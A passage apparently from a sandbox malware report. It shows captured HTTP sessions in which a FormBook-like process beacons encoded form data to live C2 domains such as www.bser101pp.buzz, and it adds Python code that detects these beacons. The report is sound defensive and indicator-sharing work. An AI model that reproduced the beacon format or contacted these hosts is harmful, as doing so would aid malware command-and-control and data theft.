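    """Sorted (host, path) pairs for every request that scores as a beacon."""
    return sorted({(r["headers"].get("Host", ""), r["path"].partition("?")[0])
                   for r in reqs if is_formbook_like(r)})


if __name__ == "__main__":
    for r in SAMPLES:
        print(r["method"], r["headers"].get("Host"), sorted(beacon_indicators(r)))
    print(extract_iocs(SAMPLES))
```

Run as-is it prints the indicator set per request and the two (host, path) pairs; in practice the same functions would be fed parsed proxy or Zeek http.log records. The self-referencing Origin/Referer and the single opaque form parameter are the strongest of these traits; Connection: close is common on its own and only counts in combination, which is why the score requires several traits at once.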


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.9 | 50023 | 104.21.58.90 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:23:56.810878038 CET | 598 | OUT | POST /crrp/ HTTP/1.1
                                                                                                                        Host: www.bser101pp.buzz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.bser101pp.buzz
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.bser101pp.buzz/crrp/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 6a 72 4c 2f 61 36 58 79 35 4c 75 51 6f 6b 54 76 35 53 38 2f 37 34 42 56 35 59 4d 62 53 2b 4f 6a 50 6e 35 4e 4a 6f 55 31 59 55 6f 68 55 51 6e 67 38 45 61 75 2b 4a 69 44 49 2b 73 37 36 49 61 2f 4d 76 33 34 41 4c 45 44 32 37 33 52 46 6b 6d 35 68 50 56 36 6f 6c 6c 58 37 71 33 37 37 73 66 32 47 65 47 59 61 69 58 59 64 66 73 5a 72 55 71 71 4b 6d 69 6c 42 69 4b 31 5a 44 47 30 38 4d 43 78 79 45 78 6a 45 75 63 65 57 4d 4d 76 5a 46 4b 55 79 4c 64 48 4a 6c 64 67 5a 66 58 74 74 42 32 49 43 37 4b 47 31 68 68 37 72 6e 63 75 74 59 6f 6e 46 2b 73 76 4c 6b 42 5a 6f 66 2b 54
                                                                                                                        Data Ascii: bBw=jrL/a6Xy5LuQokTv5S8/74BV5YMbS+OjPn5NJoU1YUohUQng8Eau+JiDI+s76Ia/Mv34ALED273RFkm5hPV6ollX7q377sf2GeGYaiXYdfsZrUqqKmilBiK1ZDG08MCxyExjEuceWMMvZFKUyLdHJldgZfXttB2IC7KG1hh7rncutYonF+svLkBZof+T
Nov 21, 2024 16:23:58.133624077 CET | 957 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:57 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8WBi5HM25E7enDUhJaqU7xdSjqHih%2FJoFVuWCuDtvKpCXnd8kLkuchCW%2FpCMVWvh9dq%2B74vhcKo1nNLQG0hml%2FZT3xvV1%2Fw2x9RH3MgOffCaAaJ%2BjHoyH3SaxwhG40%2FvDeHGgOQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61af165b311811-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3020&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=598&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.9 | 50024 | 104.21.58.90 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:23:59.469146967 CET | 622 | OUT | POST /crrp/ HTTP/1.1
                                                                                                                        Host: www.bser101pp.buzz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.bser101pp.buzz
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.bser101pp.buzz/crrp/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 6a 72 4c 2f 61 36 58 79 35 4c 75 51 70 46 44 76 70 43 41 2f 71 6f 42 57 38 59 4d 62 49 4f 50 4c 50 6e 39 4e 4a 71 6b 66 5a 6d 63 68 54 79 2f 67 39 46 61 75 33 5a 69 44 44 65 73 45 30 6f 61 34 4d 76 72 77 41 4f 6b 44 32 36 58 52 46 6d 75 35 68 34 35 6c 6f 31 6c 76 32 4b 33 35 6b 38 66 32 47 65 47 59 61 6a 33 2b 64 66 30 5a 72 46 61 71 4c 45 61 69 49 43 4b 30 52 6a 47 30 32 63 43 31 79 45 78 37 45 73 6f 34 57 4f 30 76 5a 45 36 55 38 2f 4a 45 53 56 64 69 48 76 57 41 6b 69 44 63 4f 63 53 50 30 51 4a 67 71 47 4d 4e 75 35 55 35 55 4d 6c 30 65 7a 42 2b 76 34 33 37 34 4a 58 71 35 37 30 59 61 68 6f 32 49 6f 50 4b 44 66 35 4f 53 67 3d 3d
                                                                                                                        Data Ascii: bBw=jrL/a6Xy5LuQpFDvpCA/qoBW8YMbIOPLPn9NJqkfZmchTy/g9Fau3ZiDDesE0oa4MvrwAOkD26XRFmu5h45lo1lv2K35k8f2GeGYaj3+df0ZrFaqLEaiICK0RjG02cC1yEx7Eso4WO0vZE6U8/JESVdiHvWAkiDcOcSP0QJgqGMNu5U5UMl0ezB+v4374JXq570Yaho2IoPKDf5OSg==
Nov 21, 2024 16:24:00.716937065 CET | 949 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:24:00 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wKCL1WGTcn7vM9epVkZymmt%2FLL%2BGkQUmigAT4BMUFvuQihnl2jUSGJCFnbOG4pytmvpjxYLwi0Eo9SwGHkSB8gcCQnHR9HPLL%2F3yzGxddhuvrZa8JDyva2JSn5ifL5ZTvxNpcb8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61af26ab340f65-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1598&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=622&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.9 | 50025 | 104.21.58.90 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:24:02.145051003 CET | 1635 | OUT | POST /crrp/ HTTP/1.1
                                                                                                                        Host: www.bser101pp.buzz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.bser101pp.buzz
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.bser101pp.buzz/crrp/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 6a 72 4c 2f 61 36 58 79 35 4c 75 51 70 46 44 76 70 43 41 2f 71 6f 42 57 38 59 4d 62 49 4f 50 4c 50 6e 39 4e 4a 71 6b 66 5a 6d 6b 68 54 48 6a 67 79 47 69 75 6c 4a 69 44 4f 2b 73 2f 30 6f 62 6b 4d 76 7a 30 41 4f 6f 31 32 2b 6e 52 47 46 32 35 70 73 74 6c 6a 31 6c 76 2f 71 33 30 37 73 65 73 47 65 57 63 61 69 62 2b 64 66 30 5a 72 48 53 71 64 6d 69 69 45 69 4b 31 5a 44 47 52 38 4d 44 69 79 45 70 42 45 73 74 46 58 36 41 76 5a 6b 71 55 78 71 64 45 50 6c 64 73 47 76 57 59 6b 69 66 71 4f 59 36 44 30 51 39 47 71 42 41 4e 2b 73 31 50 44 4d 74 66 64 67 56 68 71 37 72 6c 77 2f 4c 75 2b 37 31 45 4e 41 73 43 51 74 4f 4b 47 4c 67 59 4f 33 41 43 79 33 45 79 79 2b 42 56 6e 51 65 2b 35 59 33 58 49 42 4d 5a 75 69 79 6a 53 45 56 66 4d 46 33 67 68 6e 7a 4b 78 6d 7a 31 68 74 36 43 47 62 2b 6a 34 50 53 4f 69 67 77 70 35 68 64 6f 64 38 56 63 57 49 41 42 74 4f 2b 4d 6e 37 49 46 74 66 2b 79 6e 77 53 52 61 69 54 2b 4e 70 65 36 4c 46 68 38 63 34 35 44 63 38 58 49 43 59 76 57 43 31 56 66 44 63 6d 6b 62 79 55 52 31 48 [TRUNCATED]
Data Ascii: bBw=jrL/a6Xy5LuQpFDvpCA/qoBW8YMbIOPLPn9NJqkfZmkhTHjgyGiulJiDO+s/0obkMvz0AOo12+nRGF25pstlj1lv/q307sesGeWcaib+df0ZrHSqdmiiEiK1ZDGR8MDiyEpBEstFX6AvZkqUxqdEPldsGvWYkifqOY6D0Q9GqBAN+s1PDMtfdgVhq7rlw/Lu+71ENAsCQtOKGLgYO3ACy3Eyy+BVnQe+5Y3XIBMZuiyjSEVfMF3ghnzKxmz1ht6CGb+j4PSOigwp5hdod8VcWIABtO+Mn7IFtf+ynwSRaiT+Npe6LFh8c45Dc8XICYvWC1VfDcmkbyUR1H [TRUNCATED]
Nov 21, 2024 16:24:03.413825035 CET | 952 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:24:03 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zghla1s3RrQE4kuM1%2B3991YIerDBPGjH2R%2BBz6HRD8T9WCJLBenDSLHF20rYFtR8KgMyTdE6rrzQEoCVs88vWIrfFPmO1h9PnqeeljTiqrhw%2BB41r%2ByVTIUCnXTXdIlAgewQeAI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61af378bd541e1-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4646&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1635&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.9 | 50026 | 104.21.58.90 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:24:04.807034969 CET | 340 | OUT | GET /crrp/?bBw=upjfZKq4/ZGfoF/T3gRqvMsDposBEsbCPxdbSO05fQ4zSiP5+UGAxJqZOtAYqZWCOef+BeM6z+3JdRqWgtx/gAtazJHp7Z7XNdyJQnSFd8YmyBfIfQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.bser101pp.buzz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 21, 2024 16:24:05.987823963 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:24:05 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CtvCmy8vM6qq11k%2FxHyaNqMnLNvW354ybLYiIlQYDQEDf%2BVbpPdb%2BoHa0ClLpKhWHEcurvJFwK7FuKiYlHRseloyzTw%2BsDs%2Fgxmsf%2F5hFKlT5KopH5R9NRZbWKM1NzIW%2FVTDoOk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61af47ceb143a9-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1631&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=340&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                                        Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page
Nov 21, 2024 16:24:05.987845898 CET | 79 | IN | Data Raw: 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: -->... a padding to disable MSIE and Chrome friendly error page -->0
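The sessions above share one request shape: a POST to a single four-character directory with a form body of one short parameter (`bBw=`) carrying base64-like data, a GET with the same parameter in the query plus a second short one (`PBk=`), Origin and Referer pointing back at the request path, `Connection: close`, `Cache-Control: max-age=0`, and the `MATMJS` token in the User-Agent, repeated against a rotating set of decoy domains. The following detection example is added here and is not part of the Joe Sandbox report: it scores those traits over raw HTTP requests. The sample requests are constructed to mirror sessions 49 and 52 (payload strings are made up); the regexes, the indicator names and the threshold are this example's own assumptions, and the parameter check keys on the shape of the names rather than on the literal `bBw`, so a build using a different name would still match.

```python
import re
from urllib.parse import urlsplit

# Traits shared by the beacons in the sessions above. The regexes, the
# indicator names and MIN_SCORE are this example's own choices (assumptions),
# not Joe Sandbox signatures.
SHORT_DIR_PATH = re.compile(r"^/[a-z0-9]{4}/$")        # /crrp/, /6wln/, /z3ox/
SHORT_PARAM = re.compile(r"^[A-Za-z0-9]{2,4}$")         # bBw, PBk
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
UA_MARKER = "MATMJS"
MIN_SCORE = 3


def parse_request(raw: str) -> dict:
    """Split one raw HTTP/1.1 request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def _split_params(encoded: str) -> dict:
    """Split a query string or form body without URL-decoding the values, so a
    '+' inside base64 survives (urllib.parse.parse_qs would turn it into a space)."""
    params = {}
    for pair in encoded.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params[name] = value
    return params


def formbook_indicators(req: dict) -> list:
    """Return the names of the beacon traits present in one parsed request."""
    hits = []
    headers = req["headers"]
    url = urlsplit(req["target"])
    host = headers.get("host", "")

    if SHORT_DIR_PATH.match(url.path):
        hits.append("single four-character directory path")
    if UA_MARKER in headers.get("user-agent", ""):
        hits.append("MATMJS token in User-Agent")
    if host and headers.get("origin") == f"http://{host}" \
            and headers.get("referer") == f"http://{host}{url.path}":
        hits.append("Origin and Referer point back at the request path")
    if headers.get("connection", "").lower() == "close" \
            and headers.get("cache-control") == "max-age=0":
        hits.append("Connection: close with Cache-Control: max-age=0")

    params = _split_params(req["body"] if req["method"] == "POST" else url.query)
    if params and all(SHORT_PARAM.match(k) for k in params) \
            and any(BASE64ISH.match(v) for v in params.values()):
        hits.append("short parameter names carrying a base64-like payload")
    return hits


def is_formbook_beacon(raw: str) -> bool:
    """True when at least MIN_SCORE traits are present in the request."""
    return len(formbook_indicators(parse_request(raw))) >= MIN_SCORE


# Constructed samples modelled on sessions 49 and 52 above; the payload
# strings are made up and carry no real data.
UA = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)"
BEACON_POST = (
    "POST /crrp/ HTTP/1.1\r\n"
    "Host: www.bser101pp.buzz\r\n"
    "Accept: */*\r\n"
    "Origin: http://www.bser101pp.buzz\r\n"
    "Cache-Control: max-age=0\r\n"
    "Connection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Referer: http://www.bser101pp.buzz/crrp/\r\n"
    f"User-Agent: {UA}\r\n"
    "\r\n"
    "bBw=" + "QUJD" * 16
)
BEACON_GET = (
    "GET /crrp/?bBw=" + "eHl6" * 12 + "&PBk=f4VDN8Bp14IhbV HTTP/1.1\r\n"
    "Host: www.bser101pp.buzz\r\n"
    "Accept: */*\r\n"
    "Connection: close\r\n"
    f"User-Agent: {UA}\r\n"
    "\r\n"
)
BENIGN_GET = (
    "GET /index.html?page=2 HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Connection: keep-alive\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, sample in (("POST", BEACON_POST), ("GET", BEACON_GET), ("benign", BENIGN_GET)):
        hits = formbook_indicators(parse_request(sample))
        print(f"{label}: beacon={is_formbook_beacon(sample)} {hits}")
```

The scoring is deliberately a sum of weak signals: the plaintext HTTP on port 80, the IE10-on-Windows-7 User-Agent and a 404 from every host are each unremarkable on their own, but a process under `C:\Program Files (x86)\` producing all of them against several freshly registered domains within seconds is the pattern worth alerting on. Note that the domains answer 404 in every session here, so a detection that waits for a successful C2 exchange would never fire.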


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.9 | 50027 | 172.67.192.207 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:24:11.483397007 CET | 619 | OUT | POST /6wln/ HTTP/1.1
                                                                                                                        Host: www.3kw40881107247y.click
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.3kw40881107247y.click
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.3kw40881107247y.click/6wln/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 74 6d 53 6b 58 53 65 6f 51 79 6b 58 78 5a 70 35 6e 42 56 39 79 4c 63 64 62 41 47 51 62 59 38 6b 6a 56 55 72 77 32 48 6c 45 6a 35 79 78 4a 68 44 4b 55 62 4a 34 31 59 66 59 50 66 6d 76 64 6c 5a 76 4c 66 61 39 4b 6f 79 46 33 2b 30 39 74 56 41 64 75 49 42 43 76 66 47 77 44 47 65 6c 45 6f 55 51 62 56 2f 30 4f 79 57 31 39 2f 70 59 41 49 36 36 72 53 34 75 4d 43 64 2b 33 32 46 37 2b 6c 70 6c 65 39 65 47 6f 55 6b 78 34 45 46 4f 66 32 69 52 35 38 44 31 75 54 35 6b 45 36 45 61 42 6e 52 59 57 45 4d 7a 57 35 7a 51 32 36 37 35 6e 56 5a 57 58 77 62 7a 36 55 45 4c 33 67 61
                                                                                                                        Data Ascii: bBw=tmSkXSeoQykXxZp5nBV9yLcdbAGQbY8kjVUrw2HlEj5yxJhDKUbJ41YfYPfmvdlZvLfa9KoyF3+09tVAduIBCvfGwDGelEoUQbV/0OyW19/pYAI66rS4uMCd+32F7+lple9eGoUkx4EFOf2iR58D1uT5kE6EaBnRYWEMzW5zQ2675nVZWXwbz6UEL3ga
Nov 21, 2024 16:24:12.643196106 CET | 950 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:24:12 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfbhwjt07m%2BSUxAFwTfjhAKJZh5fc9GJ4lR9Poz%2FPlfqOqlDIhbdY3wRiLnEwVChJ2zGPWpEa3InWM1%2BtXsuT7168fhL93VIE4zJi0PaLIE3ejng4nVdZXQsqoKLWt2mw85KKpfZXmkF191g"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61af71c8a23300-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1981&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=619&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                                                                                                        Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
Nov 21, 2024 16:24:12.645181894 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                        54          192.168.2.9  50028        172.67.192.207  80
                                                                                                                        Timestamp                              Bytes transferred  Direction  Data
                                                                                                                        Nov 21, 2024 16:24:15.373236895 CET    643                OUT        POST /6wln/ HTTP/1.1
                                                                                                                        Host: www.3kw40881107247y.click
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
